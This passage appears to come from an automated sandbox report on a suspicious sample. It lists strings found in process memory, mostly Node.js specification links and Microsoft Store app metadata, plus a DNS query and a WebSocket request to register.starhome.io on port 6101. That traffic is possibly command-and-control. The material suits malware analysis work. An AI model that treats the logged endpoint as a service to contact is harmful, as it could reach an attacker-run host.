          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://no-color.org/
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://nodejs.org/
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
          Source: node.exe, 00000022.00000002.620060167.000000001CA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/
          Source: node.exe, 00000022.00000002.620060167.000000001CA40000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.612343687.0000000002217000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gz
          Source: node.exe, 00000022.00000002.620060167.000000001CA40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gz%
          Source: node.exe, 00000022.00000002.620060167.000000001CA40000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.612343687.0000000002217000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/node-v12.22.12.tar.gz
          Source: node.exe, 00000022.00000002.620060167.000000001CA40000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.612343687.0000000002217000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v12.22.12/win-x86/node.lib
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
          Source: svchost.exe, 00000009.00000002.311375207.000001D5F963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000009.00000002.311253224.000001D5F9613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311375207.000001D5F963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310660287.000001D5F9645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310660287.000001D5F9645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000009.00000003.288603794.000001D5F9632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000009.00000002.311371655.000001D5F963B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.288603794.000001D5F9632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000009.00000003.310649707.000001D5F9647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311417918.000001D5F964E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
          Source: node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
          Source: svchost.exe, 00000031.00000003.501712973.0000015A14185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
          Source: svchost.exe, 00000031.00000003.501712973.0000015A14185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
          Source: node.exe, 00000022.00000002.623548071.000000003ACC0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.604744457.0000000001801000.00000040.00000001.01000000.0000000E.sdmp, node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
          Source: svchost.exe, 00000031.00000003.516815673.0000015A141AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.517655128.0000015A14196000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.518006368.0000015A14602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.517149780.0000015A141AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.517385479.0000015A14185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
          Source: node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.555929864.00000000009CC000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.556464903.0000000000A0D000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.559144416.0000000002C7D000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wftpserver.com/
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000003.346283187.0000000003A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wftpserver.com/6https://www.wftpserver.com/6https://www.wftpserver.com/
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
          Source: node.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
          Source: unknownDNS traffic detected: queries for: register.starhome.io
          Source: global trafficHTTP traffic detected: GET /strvn HTTP/1.1Sec-WebSocket-Version: 13Sec-WebSocket-Key: 6vBj9xxRPKmrnN/oh+G2pw==Connection: UpgradeUpgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: register.starhome.io:6101
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: svchost.exe, 00000031.00000003.530894837.0000015A14189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-09-08T06:50:29.2297325Z||.||7ac20334-07cb-4866-888a-33234768f7ef||1152921505695254448||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
          Source: svchost.exe, 00000031.00000003.530894837.0000015A14189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-09-08T06:50:29.2297325Z||.||7ac20334-07cb-4866-888a-33234768f7ef||1152921505695254448||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
          Source: svchost.exe, 00000031.00000003.530894837.0000015A14189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":110594921,"MaxInstallSizeInBytes":218030080,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0","PackageId":"e3ffbaf1-533d-0e62-534a-7003b35c0759-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275 equals www.facebook.com (Facebook)
          Source: svchost.exe, 00000031.00000003.530894837.0000015A14189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":110594921,"MaxInstallSizeInBytes":218030080,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0","PackageId":"e3ffbaf1-533d-0e62-534a-7003b35c0759-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275 equals www.twitter.com (Twitter)
          Source: svchost.exe, 00000031.00000003.525140603.0000015A141AF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.525562566.0000015A1418D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-09-09T22:39:32.7082563Z||.||e86fc780-362a-40ac-a492-00a82914d51a||1152921505695235378||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2022-09-09T22:38:30.0902509Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
